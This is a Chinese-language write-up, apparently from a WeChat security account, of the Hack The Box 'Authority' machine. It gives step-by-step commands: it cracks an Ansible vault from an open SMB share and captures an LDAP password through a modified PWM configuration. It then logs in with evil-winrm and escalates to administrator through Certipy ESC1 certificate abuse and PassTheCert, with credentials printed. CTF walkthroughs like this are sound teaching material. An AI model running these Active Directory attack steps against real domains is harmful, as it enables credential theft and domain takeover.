点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
信息收集
nmap 简单的扫一下端口
发现开放了很多端口 IIS服务器,AD服务器,kerberos服务器,还有ldap服务
先访问80和8443两个http服务端口 看看有什么东西
80端口是一个Microsoft IIS httpd 10.0 扫了一下后台 也没有东西
8443端口点进去是一个登录页面
这对应于设计用于 LDAP 目录的开源自助服务密码应用程序。有了从金库获得的凭证,就有可能使用它们来访问面板。
漏洞利用
之后又去找了找有没有历史漏洞 没有找到 然后又扫了扫后台目录 也没有东西
那就回到之前的端口看看别的端口有东西没
既然80是指定不行了,那就该轮到445了,我们先看看smb有没有什么目录是可以无密码访问的。
发现可以无密码列举文件
最终 一直进入到\10.10.11.222DevelopmentAutomationAnsiblePWMdefaults里面 发现有一个main.yml
通过名字 确定是管理员的密码
查到了是ansible加密的
通过网上查到了解密的方式
首先通过工具ansible2john.py把这个转换为john能破解的hash值 再用john来破解 来得到密钥
再通过cat 1.yml | ansible-vault decrypt 得到三个密码
得到密钥
解密得到密码
登录后台
再回到8443页面 利用管理员账户 登录
这好像是一个ldap服务器文件配置管理的后台 可以下载ldap的配置文件
下载下来查看
把服务器地址改为咱的监听端口
保存重新上传
成功监听到 并且获得到了密码
lDaP_1n_th3_cle4r!
那就登录看看
evil-winrm -i 10.10.11.222 -u svc_ldap -p lDaP_1n_th3_cle4r!
登录成功
拿到普通用户权限
提权
先用Certipy检测活动目录证书安全
certipy find -vulnerable -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222
看一下输出结果
发现一处有关ESC1的漏洞
接下来去网上找一下ESC1的提权
https://xz.aliyun.com/t/11627#toc-7
验证用户的权限后,我们观察到可以使用域用户的凭据在Active Directory中添加新的计算机帐户。在这种情况下,我们将使用impacket-addcomputer工具,输入
impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -computer-name STX$ -computer-pass password123
请求一下带有管理员权限的证书
certipy req -u 'STX$' -p 'password123' -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn [email protected] -dns authority.authority.htb -dc-ip 10.10.11.222
然后我们再把获取到的.pfx文件拆成证书和密钥。
certipy cert -pfx administrator_authority.pfx -nokey -out user.crt
certipy cert -pfx administrator_authority.pfx -nocert -out user.key
使用 passthecert.py工具,我们可以使用证书向 LDAPS 服务器进行身份验证,从而将我们的用户添加到管理员组
https://shigophilo.github.io/PassTheCert/
https://github.com/AlmondOffSec/PassTheCert
python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
再次登录
evil-winrm -i 10.10.11.222 -u svc_ldap -p lDaP_1n_th3_cle4r!
登陆后输入 net user svc_ldap
拿到root权限
欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】
#
企业简介
赛克艾威 - 专注政企安全服务
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
官网|https://sechub.com.cn
关注我们
公众号:sechub安全
哔哩号:SecHub官方账号
原文始发于微信公众号(SecHub网络安全社区):HTB-Authority
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论